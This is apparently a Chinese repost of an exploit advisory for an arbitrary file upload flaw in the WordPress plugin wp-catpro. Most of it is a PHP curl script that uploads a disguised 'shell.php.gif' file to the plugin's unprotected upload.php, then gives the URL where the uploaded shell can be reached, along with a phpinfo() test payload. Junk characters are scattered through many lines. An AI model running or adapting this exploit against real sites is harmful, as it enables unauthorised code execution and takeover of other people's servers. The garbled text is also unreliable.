WordPress插件wp-catpro任意文件上传

admin

Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

: u( X  j7 C6 W0 E作者  => Zikou-16
! e6 w% P1 a* I邮箱 => zikou16x@gmail.com
; K) T0 {% ?# F$ V$ _测试系统 : Windows 7 , Backtrack 5r3
. d" I& ~! C6 r" Z下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
7 ~+ H9 J# D. k- k####

& Q+ x; x% U( D3 t#=> Exploit 信息:
% x% ~% c: B1 Z$ d4 f* b7 ?------------------
# 攻击者可以上传 file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
8 a: N9 Z. u% @& ~! {9 g# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------
7 {- u9 c5 ~, `/ l) K7 d. V; @
#=> Exploit
. L5 h0 j7 a, p5 F5 u-----------
9 |5 K9 k/ v* s" x+ A5 N<?php
1 V/ x, A  s  X" A$ k- C
- G: q2 s6 l! P$uploadfile="zik.php.gif";
+ e! h& {3 G& I$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
, {* q# C+ E( D1 X% Kcurl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
+ m  n) E8 r) v: C  `9 |array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
6 E! R! h8 P1 A" D
print "$postResult";
; S- Z- L9 n' F1 O' G
Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
/ d: Z* [$ P% B. A/ Q/ z  ?>
# D1 J# Z2 I' i<?php
phpinfo();
?>